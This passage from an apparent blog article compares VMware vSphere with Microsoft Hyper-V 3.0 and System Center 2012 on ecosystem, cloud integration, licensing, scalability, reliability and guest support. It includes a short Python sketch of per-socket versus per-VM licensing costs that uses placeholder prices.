While smaller infrastructures can do well with just a hypervisor and management, enterprises need a lot of additional tooling to manage the virtual infrastructure efficiently. VMware is the clear winner here: there are lots of third-party solutions supported on vSphere for functions like backup, performance monitoring, disaster recovery, management, and virtual appliances.
Lots of hardware vendors also offer solutions for vSphere.
Microsoft itself has a growing number of solutions in the System Center suite to manage both the physical and virtual infrastructure, and the eco-system is growing with solutions like Veeam Backup & Replication for Hyper-V backup.

Cloud connectivity
A vSphere private cloud can easily be integrated with a vSphere-based public cloud using vCloud Director. In the near future, virtual machines will be able to be vMotioned from the private cloud to the public cloud and back.
Microsoft has some integration between a private cloud and the Azure public cloud using the new System Center App Controller 2012. This software delivers self-service deployment of services to either private or public cloud, rather than the management functionality that vCloud Connector delivers.

Public cloud
For a public cloud, additional tooling is needed. Both Microsoft System Center 2012 and VMware software like vCloud Director and the vCenter Operations Management Suite offer the ability to build and operate a private cloud.
Microsoft does not offer a chargeback tool like VMware does with Capacity IQ, and System Center 2012 products deliver only limited functionality for lifecycle management and capacity management.
Microsoft also offers only limited security solutions between virtual datacenters, whereas VMware has a range of solutions in the vShield family.
SCVMM 2012 combined with Server App-V allows automatic deployment of both virtual machines and server applications such as SQL Server and Internet Information Services.

The Microsoft System Center Suite 2012 is licensed per CPU socket in the host, while VMware solutions are mostly licensed per VM (vCenter per instance). In most if not all cases VMware's solution is more expensive, but it delivers a lot of out-of-the-box functionality.
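The difference between the two licensing models is easy to put into numbers. A sketch with deliberately made-up prices (the per-socket and per-VM figures below are placeholders for illustration, not actual Microsoft or VMware list prices):

```python
# Hypothetical list prices -- placeholders, not real vendor pricing
PER_SOCKET_PRICE = 1500.0  # e.g. a per-CPU-socket suite licence
PER_VM_PRICE = 120.0       # e.g. a per-VM management licence

def per_socket_cost(hosts, sockets_per_host, price=PER_SOCKET_PRICE):
    """Per-socket licensing: cost depends only on the physical hosts."""
    return hosts * sockets_per_host * price

def per_vm_cost(vms, price=PER_VM_PRICE):
    """Per-VM licensing: cost grows with the number of virtual machines."""
    return vms * price

# Four dual-socket hosts cost the same whether they run 40 or 400 VMs...
print(per_socket_cost(4, 2))              # 12000.0
# ...while per-VM licensing scales with the consolidation ratio:
print(per_vm_cost(40), per_vm_cost(400))  # 4800.0 48000.0
```

The crossover point depends entirely on the consolidation ratio, which is why the comparison favours per-socket licensing on densely packed hosts.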

Scalability
Microsoft did a lot of work on scalability: more servers can be part of a cluster, and larger servers are now supported. I believe Hyper-V 3.0 and vSphere are about equal here. vSphere is still limited to 2 TB virtual disk files, which can be an issue for file servers and databases; Hyper-V 3.0 raises that limit to 64 TB with the new VHDX format.

Reliability
One of the weak spots of Hyper-V 2.0 is storage. Cluster Shared Volumes can have issues, especially when backups are running; most can be solved by installing hotfixes. Hyper-V 2.0 and SCVMM 2008 do not feel as reliable and robust as ESX and vCenter Server do.
During demos of the Developer Preview of Windows Server 8 and Hyper-V 3.0 I heard some complaints about reliability. We will just have to wait and see how this evolves once Windows Server 8 is released and real-world experience builds up.

Memory management
While vSphere clearly has more memory management techniques, which enable a higher consolidation ratio on the hosts, it can be argued whether this justifies the much higher licensing cost of vSphere. Server memory is also not that expensive anymore.

Guest support
vSphere supports a wide variety of guest operating systems. If you are running various Linux distributions or even NetWare, this is an important feature.

Conclusion
Hyper-V 3.0 with Windows Server 8 and System Center 2012 is going to deliver a lot of value for a relatively low price compared to VMware's solutions. We will have to see how VMware responds. My guess is that prices will drop, vRAM entitlements will be increased, or other deals will be offered to keep VMware customers on board. This could happen toward the end of 2012.